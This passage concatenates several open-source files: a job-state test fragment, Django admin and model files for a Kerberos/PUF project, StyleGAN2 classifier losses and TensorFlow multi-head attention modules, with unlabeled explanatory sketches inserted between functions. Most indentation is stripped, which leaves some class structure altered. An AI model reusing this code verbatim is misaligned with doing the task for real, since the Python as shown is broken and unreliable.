job.get_tasks()[0].on_start()
job.get_tasks()[0].on_fail()
assert job.state == ExecutionState.FAILED
for task in job.get_tasks()[1:]:
task.on_schedule()
task.on_dispatch()
task.on_start()
task.on_finish()
assert job.state == ExecutionState.FAILED
job.get_tasks()[0].on_reset()
assert job.state == ExecutionState.RUNNING
job.get_tasks()[0].on_schedule()
job.get_tasks()[0].on_dispatch()
job.get_tasks()[0].on_start()
assert job.state == ExecutionState.RUNNING
job.get_tasks()[0].on_finish()
assert job.state == ExecutionState.FINISHED
# app/admin.py
# repo: jezzlucena/django-opp-trans (MIT license)

from django.contrib import admin
from app.models import Conversation, Mutation
admin.site.register(Conversation)
admin.site.register(Mutation)

# classifier/loss.py
# repo: Florian-Barthel/stylegan2 (BSD-Source-Code license)

import tensorflow as tf
from dnnlib.tflib.autosummary import autosummary
def cross_entropy(classifier, images, labels):
prediction = classifier.get_output_for(images, is_training=True)
loss = labels * -tf.log(prediction)
loss = autosummary('Classifier/loss', loss)
return loss, labels, prediction
def cross_entropy_focal(classifier, images, labels):
prediction = classifier.get_output_for(images, is_training=True)
loss = labels * -tf.log(prediction) * (1 - prediction) * (1 - prediction)
loss = autosummary('Classifier/loss', loss)
return loss, labels, prediction
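Both losses reduce to simple element-wise arithmetic: plain cross-entropy is -y * log(p), and the focal variant scales each term by (1 - p)**2, down-weighting tokens the classifier already predicts confidently. A minimal pure-Python sketch of that arithmetic, using hypothetical toy values rather than real model outputs:

```python
import math

def ce_terms(labels, preds):
    # Plain cross-entropy: -y * log(p), as in `labels * -tf.log(prediction)`.
    return [-y * math.log(p) for y, p in zip(labels, preds)]

def focal_terms(labels, preds):
    # Focal variant: each term is additionally scaled by (1 - p) ** 2.
    return [-y * math.log(p) * (1 - p) ** 2 for y, p in zip(labels, preds)]

labels = [0.0, 1.0, 0.0]  # one-hot toy label
preds = [0.2, 0.5, 0.3]   # toy class probabilities
plain = sum(ce_terms(labels, preds))    # only the true class contributes
focal = sum(focal_terms(labels, preds))  # same term, scaled by (1 - 0.5) ** 2
```

With p = 0.5 for the true class, the focal term is a quarter of the plain one, which is exactly the intended down-weighting effect.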
def cross_entropy_multiple(classifier, images, labels):
model_pred, color_pred, manufacturer_pred, body_pred, rotation_pred, ratio_pred, background_pred = classifier.get_output_for(images, is_training=True)
offsets = [1, 67, 12, 18, 10, 8, 5, 6]
current_offset = offsets[0]
next_offset = current_offset + offsets[1]
model_label = labels[:, current_offset:next_offset]
model_loss = model_label * -tf.log(model_pred)
model_loss = autosummary('Classifier_multiple/model_loss', model_loss)
loss = tf.reduce_sum(model_loss)
current_offset = next_offset
next_offset = current_offset + offsets[2]
color_label = labels[:, current_offset:next_offset]
color_loss = color_label * -tf.log(color_pred)
    color_loss = autosummary('Classifier_multiple/color_loss', color_loss)
loss += tf.reduce_sum(color_loss)
current_offset = next_offset
next_offset = current_offset + offsets[3]
manufacturer_label = labels[:, current_offset:next_offset]
manufacturer_loss = manufacturer_label * -tf.log(manufacturer_pred)
manufacturer_loss = autosummary('Classifier_multiple/manufacturer_loss', manufacturer_loss)
loss += tf.reduce_sum(manufacturer_loss)
current_offset = next_offset
next_offset = current_offset + offsets[4]
body_label = labels[:, current_offset:next_offset]
body_loss = body_label * -tf.log(body_pred)
body_loss = autosummary('Classifier_multiple/body_loss', body_loss)
loss += tf.reduce_sum(body_loss)
current_offset = next_offset
next_offset = current_offset + offsets[5]
rotation_label = labels[:, current_offset:next_offset]
rotation_loss = rotation_label * -tf.log(rotation_pred)
rotation_loss = autosummary('Classifier_multiple/rotation_loss', rotation_loss)
loss += tf.reduce_sum(rotation_loss)
current_offset = next_offset
next_offset = current_offset + offsets[6]
ratio_label = labels[:, current_offset:next_offset]
ratio_loss = ratio_label * -tf.log(ratio_pred)
    ratio_loss = autosummary('Classifier_multiple/ratio_loss', ratio_loss)
loss += tf.reduce_sum(ratio_loss)
current_offset = next_offset
next_offset = current_offset + offsets[7]
background_label = labels[:, current_offset:next_offset]
background_loss = background_label * -tf.log(background_pred)
background_loss = autosummary('Classifier_multiple/background_loss', background_loss)
loss += tf.reduce_sum(background_loss)
loss = autosummary('Classifier/loss', loss)
return loss, labels
def cross_entropy_multiple_focal(classifier, images, labels):
model_pred, color_pred, manufacturer_pred, body_pred, rotation_pred, ratio_pred, background_pred = classifier.get_output_for(images, is_training=True)
offsets = [1, 67, 12, 18, 10, 8, 5, 6]
current_offset = offsets[0]
next_offset = current_offset + offsets[1]
model_label = labels[:, current_offset:next_offset]
model_loss = model_label * -tf.log(model_pred) * (1 - model_pred) * (1 - model_pred)
model_loss = autosummary('Classifier_multiple/model_loss', model_loss)
loss = tf.reduce_sum(model_loss)
current_offset = next_offset
next_offset = current_offset + offsets[2]
color_label = labels[:, current_offset:next_offset]
color_loss = color_label * -tf.log(color_pred) * (1 - color_pred) * (1 - color_pred)
    color_loss = autosummary('Classifier_multiple/color_loss', color_loss)
loss += tf.reduce_sum(color_loss)
current_offset = next_offset
next_offset = current_offset + offsets[3]
manufacturer_label = labels[:, current_offset:next_offset]
manufacturer_loss = manufacturer_label * -tf.log(manufacturer_pred) * (1 - manufacturer_pred) * (1 - manufacturer_pred)
manufacturer_loss = autosummary('Classifier_multiple/manufacturer_loss', manufacturer_loss)
loss += tf.reduce_sum(manufacturer_loss)
current_offset = next_offset
next_offset = current_offset + offsets[4]
body_label = labels[:, current_offset:next_offset]
body_loss = body_label * -tf.log(body_pred) * (1 - body_pred) * (1 - body_pred)
body_loss = autosummary('Classifier_multiple/body_loss', body_loss)
loss += tf.reduce_sum(body_loss)
current_offset = next_offset
next_offset = current_offset + offsets[5]
rotation_label = labels[:, current_offset:next_offset]
rotation_loss = rotation_label * -tf.log(rotation_pred) * (1 - rotation_pred) * (1 - rotation_pred)
rotation_loss = autosummary('Classifier_multiple/rotation_loss', rotation_loss)
loss += tf.reduce_sum(rotation_loss)
current_offset = next_offset
next_offset = current_offset + offsets[6]
ratio_label = labels[:, current_offset:next_offset]
ratio_loss = ratio_label * -tf.log(ratio_pred) * (1 - ratio_pred) * (1 - ratio_pred)
    ratio_loss = autosummary('Classifier_multiple/ratio_loss', ratio_loss)
loss += tf.reduce_sum(ratio_loss)
current_offset = next_offset
next_offset = current_offset + offsets[7]
background_label = labels[:, current_offset:next_offset]
background_loss = background_label * -tf.log(background_pred) * (1 - background_pred) * (1 - background_pred)
background_loss = autosummary('Classifier_multiple/background_loss', background_loss)
loss += tf.reduce_sum(background_loss)
loss = autosummary('Classifier/loss', loss)
return loss, labels
def euclidean(classifier, images, labels, reg_factor=0.0):
prediction = classifier.get_output_for(images, is_training=True)
prediction = prediction[:, 0:2]
distance_real_rotations = tf.norm(labels - prediction, axis=-1)
distance_real_rotations = distance_real_rotations * tf.reduce_max(tf.ceil(tf.abs(labels)), axis=-1)
distance_real_rotations = autosummary('Loss/rotation_distance/real', distance_real_rotations)
    regularization = tf.reduce_sum(tf.square(prediction), axis=-1) - 1.0
loss = distance_real_rotations
loss += regularization * reg_factor
return loss, labels, prediction
def squared_euclidean(classifier, images, labels, reg_factor=0.0):
prediction = classifier.get_output_for(images, is_training=True)
prediction = prediction[:, 0:2]
distance_real_rotations = tf.square(tf.norm(labels - prediction, axis=-1))
distance_real_rotations = autosummary('Loss/rotation_distance/real', distance_real_rotations)
    regularization = tf.reduce_sum(tf.square(prediction), axis=-1) - 1.0
loss = distance_real_rotations
loss += regularization * reg_factor
return loss, labels, prediction
# kerberos/RegisterService/models.py
# repo: st12138/kerberos_puf (MIT license)

from django.db import models
# Create your models here.
class CRPModels(models.Model):
    device_id = models.CharField(max_length=64)
    challenge = models.CharField(max_length=1024, primary_key=True)
    response = models.CharField(max_length=257)
    used_times = models.CharField(max_length=100)
    update_time = models.CharField(max_length=100)
    identity = models.CharField(max_length=10)
def __str__(self):
return self.device_id
class CRPTModels(models.Model):
    device_id = models.CharField(max_length=64)
    challenge = models.CharField(max_length=1024)
    response = models.CharField(max_length=257)
    used_times = models.CharField(max_length=100)
    update_time = models.CharField(max_length=100)

# modules.py
# repo: MirunaPislar/multi-head-attention-labeller (Apache-2.0 license)

from math import ceil
import tensorflow as tf
def layer_normalization(layer, epsilon=1e-8):
"""
Implements layer normalization.
    :param layer: a 2-dimensional tensor whose first dimension is the batch_size
:param epsilon: a small number to avoid numerical issues, such as zero division.
:return: normalized tensor, of the same shape as the input
"""
with tf.variable_scope("layer_norm"):
params_shape = layer.get_shape()[-1:]
mean, variance = tf.nn.moments(layer, [-1], keep_dims=True)
beta = tf.get_variable(
name="beta", shape=params_shape, initializer=tf.zeros_initializer(), trainable=True)
gamma = tf.get_variable(
name="gamma", shape=params_shape, initializer=tf.ones_initializer(), trainable=True)
normalized = (layer - mean) / ((variance + epsilon) ** 0.5)
outputs = gamma * normalized + beta
return outputs
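Stripped of the learned gamma/beta parameters, the normalization step above is just (x - mean) / sqrt(variance + epsilon) along the last axis. A minimal pure-Python sketch of that computation for a single vector (gamma = 1, beta = 0 assumed):

```python
import math

def layer_norm(vec, eps=1e-8):
    # Normalize one vector to (approximately) zero mean and unit variance,
    # mirroring (layer - mean) / ((variance + epsilon) ** 0.5) above.
    mean = sum(vec) / len(vec)
    var = sum((x - mean) ** 2 for x in vec) / len(vec)
    return [(x - mean) / math.sqrt(var + eps) for x in vec]

out = layer_norm([1.0, 2.0, 3.0, 4.0])
```

The output has mean ~0 and mean-square ~1, which is what makes the subsequent gamma/beta affine transform well-conditioned.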
def division_masking(inputs, axis, multiplies):
"""
Masking used when dividing one element by the sum on a certain axis.
    Division by 0 is avoided: positions whose sum along the axis is 0 are left as zeros.
    :param inputs: the input needed to be divided
    :param axis: axis on which to perform the reduced sum
    :param multiplies: the shape to be used when tiling the division masks.
    :return: the normalized inputs, with zeros wherever the sum along the axis is 0.
"""
division_masks = tf.sign(tf.reduce_sum(inputs, axis=axis, keep_dims=True))
division_masks = tf.tile(division_masks, multiples=multiplies)
divided_inputs = tf.where(
tf.equal(division_masks, 0),
tf.zeros_like(inputs),
# tf.ones_like(inputs) * (-2 ** 32 + 1.0),
tf.div(inputs, tf.reduce_sum(inputs, axis=axis, keep_dims=True)))
return divided_inputs
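The effect of the masking is easiest to see on a toy matrix: rows are normalized to sum to 1, while all-zero rows pass through unchanged instead of triggering a division by zero. A minimal pure-Python analogue of the tf.where guard above:

```python
def normalize_rows(matrix):
    # Row-normalize, leaving all-zero rows untouched -- the same guard
    # the tf.where above provides for zero-sum slices.
    out = []
    for row in matrix:
        s = sum(row)
        out.append([x / s for x in row] if s != 0 else list(row))
    return out

result = normalize_rows([[1.0, 3.0], [0.0, 0.0]])
# -> [[0.25, 0.75], [0.0, 0.0]]
```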
def label_smoothing(labels, epsilon=0.1):
"""
Implements label smoothing. This prevents the model from becoming
over-confident about its predictions and thus, less prone to overfitting.
Label smoothing regularizes the model and makes it more adaptable.
:param labels: 3D tensor with the last dimension as the number of labels
:param epsilon: smoothing rate
:return: smoothed labels
"""
num_labels = labels.get_shape().as_list()[-1]
return ((1 - epsilon) * labels) + (epsilon / num_labels)
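For a concrete feel of the formula: smoothing a 4-class one-hot label with epsilon = 0.1 moves the true class from 1.0 down to 0.925 and each other class from 0.0 up to 0.025, and the distribution still sums to 1. A toy pure-Python sketch:

```python
def smooth(labels, epsilon=0.1):
    # ((1 - epsilon) * y) + (epsilon / num_labels), per class,
    # exactly as in the return statement above.
    k = len(labels)
    return [(1 - epsilon) * y + epsilon / k for y in labels]

smoothed = smooth([1.0, 0.0, 0.0, 0.0])
# -> [0.925, 0.025, 0.025, 0.025]
```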
def mask(inputs, queries=None, keys=None, mask_type=None):
"""
Generates masks and apply them to 3D inputs.
inputs: 3D tensor. [B, M, M]
queries: 3D tensor. [B, M, E]
keys: 3D tensor. [B, M, E]
"""
padding_num = -2 ** 32 + 1
if "key" in mask_type:
masks = tf.sign(tf.reduce_sum(tf.abs(keys), axis=-1)) # [B, M]
masks = tf.expand_dims(masks, axis=1) # [B, 1, M]
masks = tf.tile(masks, [1, tf.shape(queries)[1], 1]) # [B, M, M]
paddings = tf.ones_like(inputs) * padding_num
outputs = tf.where(tf.equal(masks, 0), paddings, inputs) # [B, M, M]
elif "query" in mask_type:
masks = tf.sign(tf.reduce_sum(tf.abs(queries), axis=-1)) # [B, M]
masks = tf.expand_dims(masks, axis=-1) # [B, M, 1]
masks = tf.tile(masks, [1, 1, tf.shape(keys)[1]]) # [B, M, M]
outputs = inputs * masks
else:
raise ValueError("Unknown mask type: %s. You need to choose "
"between \"keys\" and \"query\"." % mask_type)
return outputs
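The "key" branch can be illustrated without TensorFlow: any key position whose vector is all zeros (i.e. padding) has its score column overwritten with a large negative constant, so a subsequent softmax gives it effectively zero weight. A small hypothetical sketch on nested lists:

```python
PADDING_NUM = -2 ** 32 + 1

def key_mask(scores, keys):
    # scores: [M, M] attention logits; keys: [M, E] key vectors.
    # Columns belonging to all-zero (padded) keys are replaced by
    # PADDING_NUM, mirroring the tf.where in the "key" branch above.
    return [
        [s if any(k) else PADDING_NUM for s, k in zip(row, keys)]
        for row in scores
    ]

scores = [[0.5, 0.1], [0.2, 0.3]]
keys = [[1.0, 2.0], [0.0, 0.0]]  # second key position is padding
masked = key_mask(scores, keys)
```

The "query" branch is the mirror image: rows belonging to padded queries are zeroed out instead.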
def mask_2(inputs, queries=None, keys=None, mask_type=None):
"""
Generates masks and apply them to 4D inputs.
inputs: 3D tensor. [H, B, M, M]
queries: 3D tensor. [H, B, M, E]
keys: 3D tensor. [H, B, M, E]
"""
padding_num = -2 ** 32 + 1
if "key" in mask_type:
masks = tf.sign(tf.reduce_sum(tf.abs(keys), axis=-1)) # [H, B, M]
masks = tf.expand_dims(masks, axis=2) # [H, B, 1, M]
masks = tf.tile(masks, [1, 1, tf.shape(queries)[2], 1]) # [H, B, M, M]
paddings = tf.ones_like(inputs) * padding_num
outputs = tf.where(tf.equal(masks, 0), paddings, inputs) # [H, B, M, M]
elif "query" in mask_type:
masks = tf.sign(tf.reduce_sum(tf.abs(queries), axis=-1)) # [H, B, M]
masks = tf.expand_dims(masks, axis=-1) # [H, B, M, 1]
masks = tf.tile(masks, [1, 1, 1, tf.shape(keys)[2]]) # [H, B, M, M]
outputs = inputs * masks
else:
raise ValueError("Unknown mask type: %s. You need to choose "
"between \"keys\" and \"query\"." % mask_type)
return outputs
def cosine_distance_loss(inputs, take_abs=False):
"""
Computes the cosine pairwise distance loss between the input heads.
:param inputs: expects tensor with its last two dimensions [*, H, E],
where H = num heads and E = arbitrary vector dimension.
:param take_abs: take the absolute value of the cosine similarity; this
has the effect of switching from [-1, 1] to [0, 1], with the minimum at 0,
i.e. when the vectors are orthogonal, which is what we want.
However, this might not be differentiable at 0.
:return: loss of the cosine distance between any 2 pairs of head vectors.
"""
with tf.variable_scope("cosine_distance_loss"):
# Calculate the cosine similarity and cosine distance.
# The goal is to maximize the cosine distance.
normalized_inputs = tf.nn.l2_normalize(inputs, axis=-1)
permutation = list(range(len(inputs.get_shape().as_list())))
permutation[-1], permutation[-2] = permutation[-2], permutation[-1]
cos_similarity = tf.matmul(
normalized_inputs, tf.transpose(normalized_inputs, permutation))
# Mask the lower diagonal matrix.
ones = tf.ones_like(cos_similarity)
mask_upper = tf.matrix_band_part(ones, 0, -1) # upper triangular part
mask_diagonal = tf.matrix_band_part(ones, 0, 0) # diagonal
mask_matrix = tf.cast(mask_upper - mask_diagonal, dtype=tf.bool)
upper_triangular_flat = tf.boolean_mask(cos_similarity, mask_matrix)
if take_abs:
return tf.reduce_mean(tf.math.abs(upper_triangular_flat))
else:
return tf.reduce_mean(upper_triangular_flat)
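The quantity this loss averages is the cosine similarity over every unordered pair of head vectors (the strict upper triangle of the similarity matrix). A small pure-Python sketch of the same computation, under the assumption of plain list-of-lists head vectors:

```python
import math

def cosine(u, v):
    dot = sum(a * b for a, b in zip(u, v))
    nu = math.sqrt(sum(a * a for a in u))
    nv = math.sqrt(sum(b * b for b in v))
    return dot / (nu * nv)

def mean_pairwise_cosine(heads):
    # Mean cosine similarity over all unordered head pairs -- the value
    # the loss above extracts with tf.matrix_band_part / tf.boolean_mask.
    sims = [cosine(heads[i], heads[j])
            for i in range(len(heads))
            for j in range(i + 1, len(heads))]
    return sum(sims) / len(sims)

orthogonal = mean_pairwise_cosine([[1.0, 0.0], [0.0, 1.0]])  # 0.0
identical = mean_pairwise_cosine([[1.0, 0.0], [1.0, 0.0]])   # 1.0
```

Minimizing this (or its absolute value, with take_abs=True) pushes the heads toward mutual orthogonality.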
def single_head_attention_binary_labels(
inputs,
initializer,
attention_size,
sentence_lengths,
hidden_units):
"""
Computes single-head attention (just normal, vanilla, soft attention).
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best if Glorot or Xavier)
:param attention_size: number of units to use for the attention evidence
:param sentence_lengths: 2D ints of shape [B, M]
:param hidden_units: number of units to use for the processed sent tensor
:return sentence_scores: result of the attention * input; floats of shape [B]
:return sentence_predictions: predicted labels for each sentence in the batch; ints of shape [B]
:return token_scores: result of the un-normalized attention weights; floats of shape [B, M]
:return token_predictions: predicted labels for each token in each sentence; ints of shape [B, M]
"""
with tf.variable_scope("single_head_attention_binary_labels"):
attention_evidence = tf.layers.dense(
inputs=inputs, units=attention_size,
activation=tf.tanh, kernel_initializer=initializer) # [B, M, attention_size]
attention_weights = tf.layers.dense(
inputs=attention_evidence, units=1,
kernel_initializer=initializer) # [B, M, 1]
attention_weights = tf.squeeze(attention_weights, axis=-1) # [B, M]
attention_weights = tf.sigmoid(attention_weights)
token_scores = attention_weights
token_predictions = tf.where(
tf.greater_equal(token_scores, 0.5),
tf.ones_like(token_scores),
tf.zeros_like(token_scores))
token_predictions = tf.cast(tf.where(
tf.sequence_mask(sentence_lengths),
token_predictions,
tf.zeros_like(token_predictions) - 1e6), tf.int32)
attention_weights = tf.where(
tf.sequence_mask(sentence_lengths),
attention_weights, tf.zeros_like(attention_weights))
attention_weights = attention_weights / tf.reduce_sum(
attention_weights, axis=1, keep_dims=True) # [B, M]
product = inputs * tf.expand_dims(attention_weights, axis=-1) # [B, M, E]
processed_tensor = tf.reduce_sum(product, axis=1) # [B, E]
if hidden_units > 0:
processed_tensor = tf.layers.dense(
inputs=processed_tensor, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B, hidden_units]
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=1,
activation=tf.sigmoid, kernel_initializer=initializer,
name="output_sent_single_head_ff") # [B, 1]
sentence_scores = tf.reshape(
sentence_scores, shape=[tf.shape(processed_tensor)[0]]) # [B]
sentence_predictions = tf.where(
tf.greater_equal(sentence_scores, 0.5),
tf.ones_like(sentence_scores, dtype=tf.int32),
tf.zeros_like(sentence_scores, dtype=tf.int32)) # [B]
return sentence_scores, sentence_predictions, token_scores, token_predictions
def baseline_lstm_last_contexts(
last_token_contexts,
last_context,
initializer,
scoring_activation,
sentence_lengths,
hidden_units,
num_sentence_labels,
num_token_labels):
"""
    Computes token and sentence scores/predictions solely from the last context
    vectors that the Bi-LSTM has produced. Works for a flexible number of labels.
:param last_token_contexts: the (concatenated) Bi-LSTM outputs per-token.
:param last_context: the (concatenated) Bi-LSTM final state.
:param initializer: type of initializer (best if Glorot or Xavier)
:param scoring_activation: used in computing the sentence scores from the token scores (per-head)
:param sentence_lengths: 2D ints of shape [B, M]
:param hidden_units: number of units to use for the processed sentence tensor
:param num_sentence_labels: number of unique sentence labels
:param num_token_labels: number of unique token labels
:return sentence_scores: 2D floats of shape [B, num_sentence_labels]
:return sentence_predictions: predicted labels for each sentence in the batch; ints of shape [B]
:return token_scores: 3D floats of shape [B, M, num_token_labels]
:return token_predictions: predicted labels for each token in each sentence; ints of shape [B, M]
:return: attention weights will be a tensor of zeros of shape [B, M, num_token_labels].
"""
with tf.variable_scope("baseline_lstm_last_contexts"):
if hidden_units > 0:
processed_tensor = tf.layers.dense(
last_context, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer)
token_scores = tf.layers.dense(
last_token_contexts, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer)
else:
processed_tensor = last_context
token_scores = last_token_contexts
sentence_scores = tf.layers.dense(
processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_scores_lstm_ff") # [B, num_sentence_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores, axis=-1)
sentence_predictions = tf.argmax(sentence_probabilities, axis=-1) # [B]
token_scores = tf.layers.dense(
token_scores, units=num_token_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="token_scores_lstm_ff") # [B, M, num_token_labels]
masked_sentence_lengths = tf.tile(
input=tf.expand_dims(
tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_token_labels])
token_scores = tf.where(
masked_sentence_lengths,
token_scores,
tf.zeros_like(token_scores)) # [B, M, num_token_labels]
token_probabilities = tf.nn.softmax(token_scores, axis=-1)
token_predictions = tf.argmax(token_probabilities, axis=-1)
attention_weights = tf.zeros_like(token_scores)
return sentence_scores, sentence_predictions, token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def single_head_attention_multiple_labels(
inputs,
initializer,
attention_activation,
attention_size,
sentence_lengths,
hidden_units,
num_sentence_labels,
num_token_labels):
"""
    Computes single-head attention, but adapts it (naively) to make it work for multiple labels.
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best if Glorot or Xavier)
:param attention_activation: type of attention activation (soft, sharp, linear, etc)
:param attention_size: number of units to use for the attention evidence
:param sentence_lengths: 2D ints of shape [B, M]
:param hidden_units: number of units to use for the processed sent tensor
:param num_sentence_labels: number of unique sentence labels
:param num_token_labels: number of unique token labels
:return sentence_scores: 2D floats of shape [B, num_sentence_labels]
:return sentence_predictions: predicted labels for each sentence in the batch; ints of shape [B]
:return token_scores: 3D floats of shape [B, M, num_token_labels]
:return token_predictions: predicted labels for each token in each sentence; ints of shape [B, M]
"""
with tf.variable_scope("SHA_multiple_labels"):
attention_evidence = tf.layers.dense(
inputs=inputs, units=attention_size,
activation=tf.tanh, kernel_initializer=initializer) # [B, M, attention_size]
attention_evidence = tf.layers.dense(
inputs=attention_evidence, units=1,
kernel_initializer=initializer) # [B, M, 1]
attention_evidence = tf.squeeze(attention_evidence, axis=-1) # [B, M]
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence)
elif attention_activation == "sharp":
attention_weights = tf.math.exp(attention_evidence)
elif attention_activation == "linear":
attention_weights = attention_evidence
elif attention_activation == "softmax":
attention_weights = tf.nn.softmax(attention_evidence)
else:
raise ValueError("Unknown/unsupported activation for attention activation: %s."
% attention_activation)
# Mask attention weights.
attention_weights = tf.where(
tf.sequence_mask(sentence_lengths),
attention_weights, tf.zeros_like(attention_weights))
attention_weights_unnormalized = attention_weights
# Normalize attention weights.
if attention_activation != "softmax":
attention_weights = attention_weights / tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True) # [B, M]
token_scores = tf.layers.dense(
inputs=tf.expand_dims(attention_weights_unnormalized, -1),
units=num_token_labels,
kernel_initializer=initializer,
name="output_single_head_token_scores_ff") # [B, M, num_token_labels]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(token_probabilities,
axis=2, output_type=tf.int32) # [B, M]
product = inputs * tf.expand_dims(attention_weights, axis=-1) # [B, M, E]
processed_tensor = tf.reduce_sum(product, axis=1) # [B, E]
if hidden_units > 0:
processed_tensor = tf.layers.dense(
inputs=processed_tensor, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B, hidden_units]
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
kernel_initializer=initializer,
name="output_multi_sent_specified_scores_ff") # [B, num_unique_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores, axis=-1)
sentence_predictions = tf.argmax(sentence_probabilities, axis=-1) # [B]
return sentence_scores, sentence_predictions, token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def multi_head_attention_with_scores_from_shared_heads(
inputs,
initializer,
attention_activation,
hidden_units,
num_sentence_labels,
num_heads,
is_training,
dropout,
sentence_lengths,
use_residual_connection,
token_scoring_method):
"""
Computes multi-head attention (mainly inspired by the transformer architecture).
This method does not take into account any masking at any level.
All the masking will be performed before computing a primary/secondary loss.
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best if Glorot or Xavier)
:param attention_activation: type of attention activation (linear, softmax or sigmoid)
:param hidden_units: number of units to use for the processed sent tensor
:param num_sentence_labels: number of unique sentence labels
:param num_heads: number of unique token labels
:param is_training: if set to True, the current phase is a training one (rather than testing)
:param dropout: the keep_probs value for the dropout
:param sentence_lengths: the true sentence lengths, used for masking
:param use_residual_connection: if set to True, a residual connection is added to the inputs
:param token_scoring_method: can be either max, sum or avg
:return sentence_scores: 2D floats of shape [B, num_sentence_labels]
:return sentence_predictions: predicted labels for each sentence in the batch; ints of shape [B]
:return token_scores: 3D floats of shape [B, M, num_heads]
:return token_predictions: predicted labels for each token in each sentence; ints of shape [B, M]
:return token_probabilities: the token scores normalized across the axis
"""
with tf.variable_scope("MHA_sentence_scores_from_shared_heads"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Project to get the queries, keys, and values.
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
values = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
queries = tf.where(multiplication_mask, queries, tf.zeros_like(queries))
keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
values = tf.where(multiplication_mask, values, tf.zeros_like(values))
# Split and concat as many projections as the number of heads.
queries = tf.concat(
tf.split(queries, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
keys = tf.concat(
tf.split(keys, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
values = tf.concat(
tf.split(values, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B*num_heads, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask(
attention_evidence, queries, keys, mask_type="key")
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights = tf.math.exp(attention_evidence_masked)
elif attention_activation == "linear":
attention_weights = attention_evidence_masked
elif attention_activation == "softmax":
attention_weights = tf.nn.softmax(attention_evidence_masked)
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
attention_weights_unnormalized = attention_weights
# Normalize attention weights.
if attention_activation != "softmax":
attention_weights /= tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True)
# Mask rows (with values of 0), based on columns that have 0 sum.
attention_weights = mask(
attention_weights, queries, keys, mask_type="query")
attention_weights_unnormalized = mask(
attention_weights_unnormalized, queries, keys, mask_type="query")
# Apply a dropout layer on the attention weights.
if dropout > 0.0:
dropout_attention = (dropout * tf.cast(is_training, tf.float32)
+ (1.0 - tf.cast(is_training, tf.float32)))
attention_weights = tf.nn.dropout(
attention_weights, dropout_attention,
name="dropout_attention_weights") # [B*num_heads, M, M]
# [B*num_heads, M, num_units/num_heads]
product = tf.matmul(attention_weights, values)
product = tf.concat(
tf.split(product, num_heads), axis=2) # [B, M, num_units]
# Add a residual connection, followed by layer normalization.
if use_residual_connection:
product += inputs
product = layer_normalization(product) # [B, M, num_units]
processed_tensor = tf.reduce_sum(product, axis=1) # [B, num_units]
if hidden_units > 0:
processed_tensor = tf.layers.dense(
inputs=processed_tensor, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B, hidden_units]
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_unique_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
# Obtain token scores from the attention weights.
# The token scores will have shape [B*num_heads, M, 1].
if token_scoring_method == "sum":
token_scores = tf.expand_dims(tf.reduce_sum(
attention_weights_unnormalized, axis=1), axis=2)
elif token_scoring_method == "max":
token_scores = tf.expand_dims(tf.reduce_max(
attention_weights_unnormalized, axis=1), axis=2)
elif token_scoring_method == "avg":
token_scores = tf.expand_dims(tf.reduce_mean(
attention_weights_unnormalized, axis=1), axis=2)
elif token_scoring_method == "logsumexp":
token_scores = tf.expand_dims(tf.reduce_logsumexp(
attention_weights_unnormalized, axis=1), axis=2)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
token_scores = tf.concat(
tf.split(token_scores, num_heads), axis=2) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
attention_weights = tf.concat(
tf.split(tf.expand_dims(attention_weights, axis=-1), num_heads),
axis=-1) # [B, M, M, num_heads]
return sentence_scores, sentence_predictions, \
